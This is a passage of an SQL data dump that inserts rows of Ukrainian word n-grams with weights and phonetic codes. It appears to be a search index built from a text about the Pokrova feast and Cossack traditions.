на',0,1,1.7333,'к000',1,'*'),(1602929,'«краще','«краще',0,0,0.4,'к000',1,'*'),(1602930,'«краще за','«краще за',0,1,1.3,'к000',1,'*'),(1602931,'«краще за промені','«краще за промені',0,1,1.5667,'к000',1,'*'),(1602932,'«під','«під',0,0,0.2667,'п000',1,'*'),(1602933,'«під твою','«під твою',0,1,1.3,'п000',1,'*'),(1602934,'«під твою милість','«під твою милість',0,1,1.5667,'п000',1,'*'),(1602935,'«шановане','«шановане',0,0,0.6,'ш000',1,'*'),(1602936,'«шановане товариство».','«шановане товариство».',0,1,1.7333,'ш000',1,'*'),(1602937,'«шановане товариство». погоджувався','«шановане товариство». погоджувався',0,1,2,'ш000',1,'*'),(1602938,'є одним','є одним',0,1,1.2333,'є000',1,'*'),(1602939,'є одним із','є одним із',0,1,1.3333,'є000',1,'*'),(1602940,'і датою','і датою',0,1,1.2333,'і000',1,'*'),(1602941,'і датою створення','і датою створення',0,1,1.5667,'і000',1,'*'),(1602942,'і допомагаючи','і допомагаючи',0,1,1.4333,'і000',1,'*'),(1602943,'і допомагаючи у','і допомагаючи у',0,1,1.5,'і000',1,'*'),(1602944,'і захистив','і захистив',0,1,1.3333,'і000',1,'*'),(1602945,'і захистив місто','і захистив місто',0,1,1.5333,'і000',1,'*'),(1602946,'і зустрічали','і зустрічали',0,1,1.4,'і000',1,'*'),(1602947,'і зустрічали зиму','і зустрічали зиму',0,1,1.5667,'і000',1,'*'),(1602948,'і маємо','і маємо',0,1,1.2333,'і000',1,'*'),(1602949,'і маємо козацьке','і маємо козацьке',0,1,1.5333,'і000',1,'*'),(1602950,'її ікона','її ікона',0,1,1.2667,'ї000',1,'*'),(1602951,'її ікона була','її ікона була',0,1,1.4333,'ї000',1,'*'),(1602952,'її блищав','її блищав',0,1,1.3,'ї000',1,'*'),(1602953,'її блищав «краще','її блищав «краще',0,1,1.5333,'ї000',1,'*'),(1602954,'її й','її й',0,1,1.1333,'ї000',1,'*'),(1602955,'її й на','її й на',0,1,1.2333,'ї000',1,'*'),(1602956,'із найвеличніших','із найвеличніших',0,1,1.5333,'і000',1,'*'),(1602957,'із найвеличніших свят','із найвеличніших свят',0,1,1.7,'і000',1,'*'),(1602958,'із січовиків','із січовиків',0,1,1.4,'і000',1,'*'),(1602959,'із січовиків які','із січовиків які',0,1,1.5333,'і000',1,'*'),(1602960,'із собою','із собою',0,1,1.2667,'і000',1,'*'),(1602961,'із собою як','із собою як',0,1,1.3667,'і000',1,'*'),(1602962,'ікона','ікона',0,0,0.3333,'і000',1,'*'),(1602963,'ікона була','ікона була',0,1,1.3333,'і000',1,'*'),(1602964,'ікона була в','ікона була в',0,1,1.4,'і000',1,'*'),(1602965,'ікона марії','ікона марії',0,1,1.3667,'і000',1,'*'),(1602966,'ікона марії з','ікона марії з',0,1,1.4333,'і000',1,'*'),(1602967,'ікона покрови','ікона покрови',0,1,1.4333,'і000',1,'*'),(1602968,'ікона покрови символ','ікона покрови символ',0,1,1.6667,'і000',1,'*'),(1602969,'ікони','ікони',0,0,0.3333,'і000',1,'*'),(1602970,'ікони «козацька','ікони «козацька',0,1,1.5,'і000',1,'*'),(1602971,'ікони «козацька покрова»,','ікони «козацька покрова»,',0,1,1.8333,'і000',1,'*'),(1602972,'ікону','ікону',0,0,0.3333,'і000',1,'*'),(1602973,'ікону покрови','ікону покрови',0,1,1.4333,'і000',1,'*'),(1602974,'ікону покрови пресвятої','ікону покрови пресвятої',0,1,1.7667,'і000',1,'*'),(1602975,'інших козаків','інших козаків',0,1,1.4333,'і000',1,'*'),(1602976,'інших козаків що','інших козаків що',0,1,1.5333,'і000',1,'*'),(1602977,'їх очолювати','їх очолювати',0,1,1.4,'ї000',1,'*'),(1602978,'їх очолювати й','їх очолювати й',0,1,1.4667,'ї000',1,'*'),(1602979,'їхніх','їхніх',0,0,0.3333,'ї000',1,'*'),(1602980,'їхніх старшин','їхніх старшин',0,1,1.4333,'ї000',1,'*'),(1602981,'їхніх старшин під','їхніх старшин під',0,1,1.5667,'ї000',1,'*'),(1602982,'а її','а її',0,1,1.1333,'а000',2,'*'),(1602983,'а її ікона','а її ікона',0,1,1.3333,'а000',1,'*'),(1602984,'а головна','а головна',0,1,1.3,'а000',1,'*'),(1602985,'а головна січова','а головна січова',0,1,1.5333,'а000',1,'*'),(1602986,'а на','а на',0,1,1.1333,'а000',1,'*'),(1602987,'а на прохання','а на прохання',0,1,1.4333,'а000',1,'*'),(1602988,'а оскільки','а оскільки',0,1,1.3333,'а000',1,'*'),(1602989,'а оскільки у','а оскільки у',0,1,1.4,'а000',1,'*'),(1602990,'а після','а після',0,1,1.2333,'а000',1,'*'),(1602991,'а після обіду','а після обіду',0,1,1.4333,'а000',1,'*'),(1602992,'а покрив','а покрив',0,1,1.2667,'а000',1,'*'),(1602993,'а покрив у','а покрив у',0,1,1.3333,'а000',1,'*'),(1602994,'а ще','а ще',0,1,1.1333,'а000',1,'*'),(1602995,'а ще цього','а ще цього',0,1,1.3333,'а000',1,'*'),(1602996,'або фатою','або фатою',0,1,1.3,'а000',1,'*'),(1602997,'або фатою а','або фатою а',0,1,1.3667,'а000',1,'*'),(1602998,'ангелами','ангелами',0,0,0.5333,'а000',1,'*'),(1602999,'ангелами та','ангелами та',0,1,1.3667,'а000',1,'*'),(1603000,'ангелами та святими','ангелами та святими',0,1,1.6333,'а000',1,'*'),(1603001,'армії упа','армії упа',0,1,1.3,'а000',1,'*'),(1603002,'асоціюється','асоціюється',0,0,0.7333,'а000',1,'*'),(1603003,'асоціюється з','асоціюється з',0,1,1.4333,'а000',1,'*'),(1603004,'асоціюється з весільним','асоціюється з весільним',0,1,1.7667,'а000',1,'*'),(1603005,'бере народ','бере народ',0,1,1.3333,'б000',1,'*'),(1603006,'бере народ під','бере народ під',0,1,1.4667,'б000',1,'*'),(1603007,'благодать','благодать',0,0,0.6,'б000',1,'*'),(1603008,'благодать незримо','благодать незримо',0,1,1.5667,'б000',1,'*'),(1603009,'благодать незримо покриває','благодать незримо покриває',0,1,1.8667,'б000',1,'*'),(1603010,'блищав','блищав',0,0,0.4,'б000',1,'*'),(1603011,'блищав «краще','блищав «краще',0,1,1.4333,'б000',1,'*'),(1603012,'блищав «краще за','блищав «краще за',0,1,1.5333,'б000',1,'*'),(1603013,'бо','бо',0,0,0.1333,'б000',1,'*'),(1603014,'бо зазвичай','бо зазвичай',0,1,1.3667,'б000',1,'*'),(1603015,'бо зазвичай на','бо зазвичай на',0,1,1.4667,'б000',1,'*'),(1603016,'бога','бога',0,0,0.2667,'б000',1,'*'),(1603017,'бога за','бога за',0,1,1.2333,'б000',1,'*'),(1603018,'бога за християн','бога за християн',0,1,1.5333,'б000',1,'*'),(1603019,'богородиці 14','богородиці 14',0,1,1.4333,'б000',1,'*'),(1603020,'богородиці 14 жовтня','богородиці 14 жовтня',0,1,1.6667,'б000',1,'*'),(1603021,'богородиці «під','богородиці «під',0,1,1.5,'б000',1,'*'),(1603022,'богородиці «під твою','богородиці «під твою',0,1,1.6667,'б000',1,'*'),(1603023,'богородиці покрова','богородиці покрова',0,1,1.6,'б000',1,'*'),(1603024,'богородиці покрова вважається','богородиці покрова вважається',0,1,1.9667,'б000',1,'*'),(1603025,'богородиці та','богородиці та',0,1,1.4333,'б000',1,'*'),(1603026,'богородиці та приснодіви','богородиці та приснодіви',0,1,1.8,'б000',1,'*'),(1603027,'богородиці у','богородиці у',0,1,1.4,'б000',1,'*'),(1603028,'богородиці у запорозьких','богородиці у запорозьких',0,1,1.8,'б000',1,'*'),(1603029,'богородиці-покрови','богородиці-покрови',0,0,1,'б000',1,'*'),(1603030,'богородиці-покрови як','богородиці-покрови як',0,1,1.7,'б000',1,'*'),(1603031,'богородиці-покрови як заступниці','богородиці-покрови як заступниці',0,1,2,'б000',1,'*'),(1603032,'богородиця','богородиця',0,0,0.6667,'б000',1,'*'),(1603033,'богородиця осяяна','богородиця осяяна',0,1,1.5667,'б000',1,'*'),(1603034,'богородиця осяяна небесним','богородиця осяяна небесним',0,1,1.8667,'б000',1,'*'),(1603035,'богослужіннях','богослужіннях',0,0,0.8667,'б000',1,'*'),(1603036,'богослужіннях пресвята','богослужіннях пресвята',0,1,1.7333,'б000',1,'*'),(1603037,'богослужіннях пресвята владичиця','богослужіннях пресвята владичиця',0,1,2,'б000',1,'*'),(1603038,'божа','божа',0,0,0.2667,'б000',1,'*'),(1603039,'божа відчуває','божа відчуває',0,1,1.4333,'б000',1,'*'),(1603040,'божа відчуває до','божа відчуває до',0,1,1.5333,'б000',1,'*'),(1603041,'божа матір','божа матір',0,1,1.3333,'б000',1,'*'),(1603042,'божа матір на','божа матір на',0,1,1.4333,'б000',1,'*'),(1603043,'божої','божої',0,0,0.3333,'б000',1,'*'),(1603044,'божої матері','божої матері',0,1,1.4,'б000',1,'*'),(1603045,'божої матері саме','божої матері саме',0,1,1.5667,'б000',1,'*'),(1603046,'божої матері та','божої матері та',0,1,1.5,'б000',1,'*'),(1603047,'боки','боки',0,0,0.2667,'б000',1,'*'),(1603048,'боки на','боки на',0,1,1.2333,'б000',1,'*'),(1603049,'боки на покрову','боки на покрову',0,1,1.5,'б000',1,'*'),(1603050,'був','був',0,0,0.2,'б000',1,'*'),(1603051,'був особливий','був особливий',0,1,1.4333,'б000',1,'*'),(1603052,'був особливий культ','був особливий культ',0,1,1.6333,'б000',1,'*'),(1603053,'була','була',0,0,0.2667,'б000',1,'*'),(1603054,'була в','була в',0,1,1.2,'б000',1,'*'),(1603055,'була в кожному','була в кожному',0,1,1.4667,'б000',1,'*'),(1603056,'була покровською','була покровською',0,1,1.5333,'б000',1,'*'),(1603057,'була покровською з\'явився','була покровською з',0,1,1.8333,'б000',1,'*'),(1603058,'була у','була у',0,1,1.2,'б000',1,'*'),(1603059,'була у кожному','була у кожному',0,1,1.4667,'б000',1,'*'),(1603060,'були','були',0,0,0.2667,'б000',1,'*'),(1603061,'були церковні','були церковні',0,1,1.4333,'б000',1,'*'),(1603062,'були церковні свята','були церковні свята',0,1,1.6333,'б000',1,'*'),(1603063,'було','було',0,0,0.2667,'б000',2,'*'),(1603064,'було в','було в',0,1,1.2,'б000',1,'*'),(1603065,'було в українських','було в українських',0,1,1.6,'б000',1,'*'),(1603066,'в кожному','в кожному',0,1,1.3,'в000',1,'*'),(1603067,'в кожному козацькому','в кожному козацькому',0,1,1.6667,'в000',1,'*'),(1603068,'в українських','в українських',0,1,1.4333,'в000',1,'*'),(1603069,'в українських козаків','в українських козаків',0,1,1.7,'в000',1,'*'),(1603070,'від ворогів','від ворогів',0,1,1.3667,'в000',1,'*'),(1603071,'від ворогів які','від ворогів які',0,1,1.5,'в000',1,'*'),(1603072,'від ворога','від ворога',0,1,1.3333,'в000',1,'*'),(1603073,'від ворога головна','від ворога головна',0,1,1.6,'в000',1,'*'),(1603074,'від гріха','від гріха',0,1,1.3,'в000',1,'*'),(1603075,'від гріха і','від гріха і',0,1,1.3667,'в000',1,'*'),(1603076,'від його','від його',0,1,1.2667,'в000',1,'*'),(1603077,'від його успішності','від його успішності',0,1,1.6333,'в000',1,'*'),(1603078,'від честі','від честі',0,1,1.3,'в000',1,'*'),(1603079,'від честі очолити','від честі очолити',0,1,1.5667,'в000',1,'*'),(1603080,'відмовитися','відмовитися',0,0,0.7333,'в000',1,'*'),(1603081,'відмовитися від','відмовитися від',0,1,1.5,'в000',1,'*'),(1603082,'відмовитися від честі','відмовитися від честі',0,1,1.7,'в000',1,'*'),(1603083,'відправляли','відправляли',0,0,0.7333,'в000',1,'*'),(1603084,'відправляли молебень','відправляли молебень',0,1,1.6667,'в000',1,'*'),(1603085,'відправляли молебень на','відправляли молебень на',0,1,1.7667,'в000',1,'*'),(1603086,'відчуває','відчуває',0,0,0.5333,'в000',1,'*'),(1603087,'відчуває до','відчуває до',0,1,1.3667,'в000',1,'*'),(1603088,'відчуває до людей','відчуває до людей',0,1,1.5667,'в000',1,'*'),(1603089,'він','він',0,0,0.2,'в000',3,'*'),(1603090,'він мав','він мав',0,1,1.2333,'в000',1,'*'),(1603091,'він мав двічі','він мав двічі',0,1,1.4333,'в000',1,'*'),(1603092,'вважається і','вважається і',0,1,1.4,'в000',1,'*'),(1603093,'вважається і датою','вважається і датою',0,1,1.6,'в000',1,'*'),(1603094,'вважалибогоматір','вважалибогоматір',0,0,1,'в000',1,'*'),(1603095,'вважалибогоматір своєю','вважалибогоматір своєю',0,1,1.7333,'в000',1,'*'),(1603096,'вважалибогоматір своєю заступницею','вважалибогоматір своєю заступницею',0,1,2,'в000',1,'*'),(1603097,'весілля','весілля',0,0,0.4667,'в000',1,'*'),(1603098,'весілля нерідко','весілля нерідко',0,1,1.5,'в000',1,'*'),(1603099,'весілля нерідко 14','весілля нерідко 14',0,1,1.6,'в000',1,'*'),(1603100,'весільним','весільним',0,0,0.6,'в000',1,'*'),(1603101,'весільним покривалом','весільним покривалом',0,1,1.6667,'в000',1,'*'),(1603102,'весільним покривалом або','весільним покривалом або',0,1,1.8,'в000',1,'*'),(1603103,'взяли із','взяли із',0,1,1.2667,'в000',1,'*'),(1603104,'взяли із собою','взяли із собою',0,1,1.4667,'в000',1,'*'),(1603105,'визволення','визволення',0,0,0.6667,'в000',1,'*'),(1603106,'визволення від','визволення від',0,1,1.4667,'в000',1,'*'),(1603107,'визволення від ворогів','визволення від ворогів',0,1,1.7333,'в000',1,'*'),(1603108,'випадає','випадає',0,0,0.4667,'в000',1,'*'),(1603109,'випадає перший','випадає перший',0,1,1.4667,'в000',1,'*'),(1603110,'випадає перший сніг','випадає перший сніг',0,1,1.6333,'в000',1,'*'),(1603111,'вирушали','вирушали',0,0,0.5333,'в000',1,'*'),(1603112,'вирушали на','вирушали на',0,1,1.3667,'в000',1,'*'),(1603113,'вирушали на зимівлю','вирушали на зимівлю',0,1,1.6333,'в000',1,'*'),(1603114,'виступали','виступали',0,0,0.6,'в000',1,'*'),(1603115,'виступали у','виступали у',0,1,1.3667,'в000',1,'*'),(1603116,'виступали у походи','виступали у походи',0,1,1.6,'в000',1,'*'),(1603117,'владичиці','владичиці',0,0,0.6,'в000',1,'*'),(1603118,'владичиці за','владичиці за',0,1,1.4,'в000',1,'*'),(1603119,'владичиці за рід','владичиці за рід',0,1,1.5333,'в000',1,'*'),(1603120,'владичиці нашої','владичиці нашої',0,1,1.5,'в000',1,'*'),(1603121,'владичиці нашої богородиці','владичиці нашої богородиці',0,1,1.8667,'в000',1,'*'),(1603122,'владичиця','владичиця',0,0,0.6,'в000',1,'*'),(1603123,'владичиця сяяла','владичиця сяяла',0,1,1.5,'в000',1,'*'),(1603124,'владичиця сяяла небесною','владичиця сяяла небесною',0,1,1.8,'в000',1,'*'),(1603125,'власної волі','власної волі',0,1,1.4,'в000',1,'*'),(1603126,'власної волі а','власної волі а',0,1,1.4667,'в000',1,'*'),(1603127,'власної зброї','власної зброї',0,1,1.4333,'в000',1,'*'),(1603128,'власної зброї не','власної зброї не',0,1,1.5333,'в000',1,'*'),(1603129,'влахернському','влахернському',0,0,0.8667,'в000',1,'*'),(1603130,'влахернському храмі','влахернському храмі',0,1,1.6333,'в000',1,'*'),(1603131,'влахернському храмі у','влахернському храмі у',0,1,1.7,'в000',1,'*'),(1603132,'воїнів які перебували','воїнів які перебували',0,1,1.7,'в000',1,'*'),(1603133,'волі','волі',0,0,0.2667,'в000',1,'*'),(1603134,'волі а','волі а',0,1,1.2,'в000',1,'*'),(1603135,'волі а на','волі а на',0,1,1.3,'в000',1,'*'),(1603136,'вони','вони',0,0,0.2667,'в000',2,'*'),(1603137,'вони вирушали','вони вирушали',0,1,1.4333,'в000',1,'*'),(1603138,'вони вирушали на','вони вирушали на',0,1,1.5333,'в000',1,'*'),(1603139,'воно','воно',0,0,0.2667,'в000',1,'*'),(1603140,'воно є','воно є',0,1,1.2,'в000',1,'*'),(1603141,'воно є одним','воно є одним',0,1,1.4,'в000',1,'*'),(1603142,'ворогів','ворогів',0,0,0.4667,'в000',1,'*'),(1603143,'ворогів які','ворогів які',0,1,1.3667,'в000',1,'*'),(1603144,'ворогів які оточили','ворогів які оточили',0,1,1.6333,'в000',1,'*'),(1603145,'ворога','ворога',0,0,0.4,'в000',1,'*'),(1603146,'ворога головна','ворога головна',0,1,1.4667,'в000',1,'*'),(1603147,'ворога головна січова','ворога головна січова',0,1,1.7,'в000',1,'*'),(1603148,'головна січова','головна січова',0,1,1.4667,'г000',1,'*'),(1603149,'головна січова церква','головна січова церква',0,1,1.7,'г000',1,'*'),(1603150,'гріха','гріха',0,0,0.3333,'г000',1,'*'),(1603151,'гріха і','гріха і',0,1,1.2333,'г000',1,'*'),(1603152,'гріха і допомагаючи','гріха і допомагаючи',0,1,1.6333,'г000',1,'*'),(1603153,'грецький','грецький',0,0,0.5333,'г000',1,'*'),(1603154,'грецький омофор','грецький омофор',0,1,1.5,'г000',1,'*'),(1603155,'грецький омофор наплічник','грецький омофор наплічник',0,1,1.8333,'г000',1,'*'),(1603156,'діва','діва',0,0,0.2667,'д000',1,'*'),(1603157,'діва марія','діва марія',0,1,1.3333,'д000',1,'*'),(1603158,'діва марія зі','діва марія зі',0,1,1.4333,'д000',1,'*'),(1603159,'діви','діви',0,0,0.2667,'д000',1,'*'),(1603160,'діви знак','діви знак',0,1,1.3,'д000',1,'*'),(1603161,'діви знак любові','діви знак любові',0,1,1.5333,'д000',1,'*'),(1603162,'дійшли','дійшли',0,0,0.4,'д000',1,'*'),(1603163,'дійшли перекази','дійшли перекази',0,1,1.5,'д000',1,'*'),(1603164,'дійшли перекази про','дійшли перекази про',0,1,1.6333,'д000',1,'*'),(1603165,'датою','датою',0,0,0.3333,'д000',1,'*'),(1603166,'датою створення','датою створення',0,1,1.5,'д000',1,'*'),(1603167,'датою створення української','датою створення української',0,1,1.9,'д000',1,'*'),(1603168,'двічі','двічі',0,0,0.3333,'д000',1,'*'),(1603169,'двічі відмовитися','двічі відмовитися',0,1,1.5667,'д000',1,'*'),(1603170,'двічі відмовитися від','двічі відмовитися від',0,1,1.7,'д000',1,'*'),(1603171,'дивовижний','дивовижний',0,0,0.6667,'д000',1,'*'),(1603172,'дивовижний покрив','дивовижний покрив',0,1,1.5667,'д000',1,'*'),(1603173,'дивовижний покрив і','дивовижний покрив і',0,1,1.6333,'д000',1,'*'),(1603174,'дня прощалися','дня прощалися',0,1,1.4333,'д000',1,'*'),(1603175,'дня прощалися з','дня прощалися з',0,1,1.5,'д000',1,'*'),(1603176,'дня часто','дня часто',0,1,1.3,'д000',1,'*'),(1603177,'дня часто призначали','дня часто призначали',0,1,1.6667,'д000',1,'*'),(1603178,'до людей','до людей',0,1,1.2667,'д000',1,'*'),(1603179,'до людей його','до людей його',0,1,1.4333,'д000',1,'*'),(1603180,'до нас','до нас',0,1,1.2,'д000',1,'*'),(1603181,'до нас дійшли','до нас дійшли',0,1,1.4333,'д000',1,'*'),(1603182,'до обіду','до обіду',0,1,1.2667,'д000',1,'*'),(1603183,'до обіду осінь','до обіду осінь',0,1,1.4667,'д000',1,'*'),(1603184,'до покрови','до покрови',0,1,1.3333,'д000',1,'*'),(1603185,'до покрови було','до покрови було',0,1,1.5,'д000',1,'*'),(1603186,'до пресвятої','до пресвятої',0,1,1.4,'д000',1,'*'),(1603187,'до пресвятої богородиці','до пресвятої богородиці',0,1,1.7667,'д000',1,'*'),(1603188,'довга','довга',0,0,0.3333,'д000',1,'*'),(1603189,'довга широка','довга широка',0,1,1.4,'д000',1,'*'),(1603190,'довга широка тканина','довга широка тканина',0,1,1.6667,'д000',1,'*'),(1603191,'допомагаючи','допомагаючи',0,0,0.7333,'д000',1,'*'),(1603192,'допомагаючи у','допомагаючи у',0,1,1.4333,'д000',1,'*'),(1603193,'допомагаючи у нелегкий','допомагаючи у нелегкий',0,1,1.7333,'д000',1,'*'),(1603194,'досить','досить',0,0,0.4,'д000',1,'*'),(1603195,'досить часто','досить часто',0,1,1.4,'д000',1,'*'),(1603196,'досить часто освячують','досить часто освячують',0,1,1.7333,'д000',1,'*'),(1603197,'дунай','дунай',0,0,0.3333,'д000',1,'*'),(1603198,'дунай взяли','дунай взяли',0,1,1.3667,'д000',1,'*'),(1603199,'дунай взяли із','дунай взяли із',0,1,1.4667,'д000',1,'*'),(1603200,'дякував','дякував',0,0,0.4667,'д000',1,'*'),(1603201,'дякував своїм','дякував своїм',0,1,1.4333,'д000',1,'*'),(1603202,'дякував своїм побратимам','дякував своїм побратимам',0,1,1.8,'д000',1,'*'),(1603203,'жовтня випадає','жовтня випадає',0,1,1.4667,'ж000',1,'*'),(1603204,'жовтня випадає перший','жовтня випадає перший',0,1,1.7,'ж000',1,'*'),(1603205,'жовтня на','жовтня на',0,1,1.3,'ж000',1,'*'),(1603206,'жовтня на козацькій','жовтня на козацькій',0,1,1.6333,'ж000',1,'*'),(1603207,'жовтня свято','жовтня свято',0,1,1.4,'ж000',1,'*'),(1603208,'жовтня свято покрови','жовтня свято покрови',0,1,1.6667,'ж000',1,'*'),(1603209,'з весільним','з весільним',0,1,1.3667,'з000',1,'*'),(1603210,'з весільним покривалом','з весільним покривалом',0,1,1.7333,'з000',1,'*'),(1603211,'з власної','з власної',0,1,1.3,'з000',1,'*'),(1603212,'з власної волі','з власної волі',0,1,1.4667,'з000',1,'*'),(1603213,'з омофором','з омофором',0,1,1.3333,'з000',1,'*'),(1603214,'з омофором була','з омофором була',0,1,1.5,'з000',1,'*'),(1603215,'з осінню','з осінню',0,1,1.2667,'з000',1,'*'),(1603216,'з осінню і','з осінню і',0,1,1.3333,'з000',1,'*'),(1603217,'з переказами','з переказами',0,1,1.4,'з000',1,'*'),(1603218,'з переказами та','з переказами та',0,1,1.5,'з000',1,'*'),(1603219,'з рідних','з рідних',0,1,1.2667,'з000',1,'*'),(1603220,'з рідних місць','з рідних місць',0,1,1.4667,'з000',1,'*'),(1603221,'з хрестом','з хрестом',0,1,1.3,'з000',1,'*'),(1603222,'з хрестом яку','з хрестом яку',0,1,1.4333,'з000',1,'*'),(1603223,'з\'явився','з',0,0,0.5333,'з000',1,'*'),(1603224,'з\'явився навіть','з навіть',0,1,1.5,'з000',1,'*'),(1603225,'з\'явився навіть особливий','з навіть особливий',0,1,1.8333,'з000',1,'*'),(1603226,'з\'явилася','з',0,0,0.6,'з000',1,'*'),(1603227,'з\'явилася людям','з людям',0,1,1.5,'з000',1,'*'),(1603228,'з\'явилася людям які','з людям які',0,1,1.6333,'з000',1,'*'),(1603229,'зі сльозами','зі сльозами',0,1,1.3667,'з000',1,'*'),(1603230,'зі сльозами стала','зі сльозами стала',0,1,1.5667,'з000',1,'*'),(1603231,'за визволення','за визволення',0,1,1.4333,'з000',1,'*'),(1603232,'за визволення від','за визволення від',0,1,1.5667,'з000',1,'*'),(1603233,'за воїнів','за воїнів',0,1,1.3,'з000',1,'*'),(1603234,'за воїнів які','за воїнів які',0,1,1.4333,'з000',1,'*'),(1603235,'за дунай','за дунай',0,1,1.2667,'з000',1,'*'),(1603236,'за дунай взяли','за дунай взяли',0,1,1.4667,'з000',1,'*'),(1603237,'за звичаєм','за звичаєм',0,1,1.3333,'з000',1,'*'),(1603238,'за звичаєм він','за звичаєм він',0,1,1.4667,'з000',1,'*'),(1603239,'за переказами','за переказами',0,1,1.4333,'з000',1,'*'),(1603240,'за переказами у','за переказами у',0,1,1.5,'з000',1,'*'),(1603241,'за промені','за промені',0,1,1.3333,'з000',1,'*'),(1603242,'за промені сонячні».','за промені сонячні».',0,1,1.6667,'з000',1,'*'),(1603243,'за рід','за рід',0,1,1.2,'з000',1,'*'),(1603244,'за рід людський','за рід людський',0,1,1.5,'з000',1,'*'),(1603245,'за різними','за різними',0,1,1.3333,'з000',1,'*'),(1603246,'за різними причинами','за різними причинами',0,1,1.6667,'з000',1,'*'),(1603247,'за християн','за християн',0,1,1.3667,'з000',1,'*'),(1603248,'за християн потім','за християн потім',0,1,1.5667,'з000',1,'*'),(1603249,'за честь','за честь',0,1,1.2667,'з000',1,'*'),(1603250,'за честь їх','за честь їх',0,1,1.3667,'з000',1,'*'),(1603251,'завершення','завершення',0,0,0.6667,'з000',2,'*'),(1603252,'завершення походу','завершення походу',0,1,1.5667,'з000',1,'*'),(1603253,'завершення походу незалежно','завершення походу незалежно',0,1,1.9,'з000',1,'*'),(1603254,'завжди','завжди',0,0,0.4,'з000',2,'*'),(1603255,'завжди була','завжди була',0,1,1.3667,'з000',1,'*'),(1603256,'завжди була покровською','завжди була покровською',0,1,1.7667,'з000',1,'*'),(1603257,'завжди називалась','завжди називалась',0,1,1.5667,'з000',1,'*'),(1603258,'завжди називалась на','завжди називалась на',0,1,1.6667,'з000',1,'*'),(1603259,'зазвичай','зазвичай',0,0,0.5333,'з000',2,'*'),(1603260,'зазвичай на','зазвичай на',0,1,1.3667,'з000',1,'*'),(1603261,'зазвичай на покрову','зазвичай на покрову',0,1,1.6333,'з000',1,'*'),(1603262,'залишалася','залишалася',0,0,0.6667,'з000',1,'*'),(1603263,'залишалася тільки','залишалася тільки',0,1,1.5667,'з000',1,'*'),(1603264,'залишалася тільки стала','залишалася тільки стала',0,1,1.7667,'з000',1,'*'),(1603265,'залишалися','залишалися',0,0,0.6667,'з000',1,'*'),(1603266,'залишалися у','залишалися у',0,1,1.4,'з000',1,'*'),(1603267,'залишалися у своїх','залишалися у своїх',0,1,1.6,'з000',1,'*'),(1603268,'залога','залога',0,0,0.4,'з000',1,'*'),(1603269,'залога із','залога із',0,1,1.3,'з000',1,'*'),(1603270,'залога із січовиків','залога із січовиків',0,1,1.6333,'з000',1,'*'),(1603271,'запорозьких','запорозьких',0,0,0.7333,'з000',1,'*'),(1603272,'запорозьких козаків','запорозьких козаків',0,1,1.6333,'з000',1,'*'),(1603273,'запорозьких козаків був','запорозьких козаків був',0,1,1.7667,'з000',1,'*'),(1603274,'запорозької','запорозької',0,0,0.7333,'з000',1,'*'),(1603275,'запорозької січі','запорозької січі',0,1,1.5333,'з000',1,'*'),(1603276,'запорозької січі у','запорозької січі у',0,1,1.6,'з000',1,'*'),(1603277,'заступниці','заступниці',0,0,0.6667,'з000',1,'*'),(1603278,'заступниці та','заступниці та',0,1,1.4333,'з000',1,'*'),(1603279,'заступниці та захисниці','заступниці та захисниці',0,1,1.7667,'з000',1,'*'),(1603280,'заступницею','заступницею',0,0,0.7333,'з000',1,'*'),(1603281,'заступницею тому','заступницею тому',0,1,1.5333,'з000',1,'*'),(1603282,'заступницею тому ікона','заступницею тому ікона',0,1,1.7333,'з000',1,'*'),(1603283,'заступництва','заступництва',0,0,0.8,'з000',1,'*'),(1603284,'заступництва владичиці','заступництва владичиці',0,1,1.7333,'з000',1,'*'),(1603285,'заступництва владичиці за','заступництва владичиці за',0,1,1.8333,'з000',1,'*'),(1603286,'захисниці','захисниці',0,0,0.6,'з000',1,'*'),(1603287,'захисниці від','захисниці від',0,1,1.4333,'з000',1,'*'),(1603288,'захисниці від ворога','захисниці від ворога',0,1,1.6667,'з000',1,'*'),(1603289,'захистив','захистив',0,0,0.5333,'з000',1,'*'),(1603290,'захистив місто','захистив місто',0,1,1.4667,'з000',1,'*'),(1603291,'захищає','захищає',0,0,0.4667,'з000',1,'*'),(1603292,'захищає кожну','захищає кожну',0,1,1.4333,'з000',1,'*'),(1603293,'захищає кожну людину','захищає кожну людину',0,1,1.6667,'з000',1,'*'),(1603294,'захищаючи','захищаючи',0,0,0.6,'з000',1,'*'),(1603295,'захищаючи рідну','захищаючи рідну',0,1,1.5,'з000',1,'*'),(1603296,'захищаючи рідну землю','захищаючи рідну землю',0,1,1.7,'з000',1,'*'),(1603297,'зброї','зброї',0,0,0.3333,'з000',2,'*'),(1603298,'зброї не','зброї не',0,1,1.2667,'з000',1,'*'),(1603299,'зброї не мали','зброї не мали',0,1,1.4333,'з000',1,'*'),(1603300,'звичаєм','звичаєм',0,0,0.4667,'з000',1,'*'),(1603301,'звичаєм він','звичаєм він',0,1,1.3667,'з000',1,'*'),(1603302,'звичаєм він мав','звичаєм він мав',0,1,1.5,'з000',1,'*'),(1603303,'згідно','згідно',0,0,0.4,'з000',1,'*'),(1603304,'згідно з','згідно з',0,1,1.2667,'з000',1,'*'),(1603305,'згідно з переказами','згідно з переказами',0,1,1.6333,'з000',1,'*'),(1603306,'землю','землю',0,0,0.3333,'з000',1,'*'),(1603307,'землю обирали','землю обирали',0,1,1.4333,'з000',1,'*'),(1603308,'землю обирали козацьких','землю обирали козацьких',0,1,1.7667,'з000',1,'*'),(1603309,'зимівлю','зимівлю',0,0,0.4667,'з000',1,'*'),(1603310,'зимівлю по','зимівлю по',0,1,1.3333,'з000',1,'*'),(1603311,'зимівлю по своїх','зимівлю по своїх',0,1,1.5333,'з000',1,'*'),(1603312,'зимівниках','зимівниках',0,0,0.6667,'з000',1,'*'),(1603313,'зимівниках на','зимівниках на',0,1,1.4333,'з000',1,'*'),(1603314,'зимівниках на січі','зимівниках на січі',0,1,1.6,'з000',1,'*'),(1603315,'зима','зима',0,0,0.2667,'з000',1,'*'),(1603316,'зима особливе','зима особливе',0,1,1.4333,'з000',1,'*'),(1603317,'зима особливе ставлення','зима особливе ставлення',0,1,1.7667,'з000',1,'*'),(1603318,'зиму','зиму',0,0,0.2667,'з000',1,'*'),(1603319,'зиму бо','зиму бо',0,1,1.2333,'з000',1,'*'),(1603320,'зиму бо зазвичай','зиму бо зазвичай',0,1,1.5333,'з000',1,'*'),(1603321,'знак','знак',0,0,0.2667,'з000',2,'*'),(1603322,'знак любові','знак любові',0,1,1.3667,'з000',1,'*'),(1603323,'знак любові та','знак любові та',0,1,1.4667,'з000',1,'*'),(1603324,'знак того','знак того',0,1,1.3,'з000',1,'*'),(1603325,'знак того що','знак того 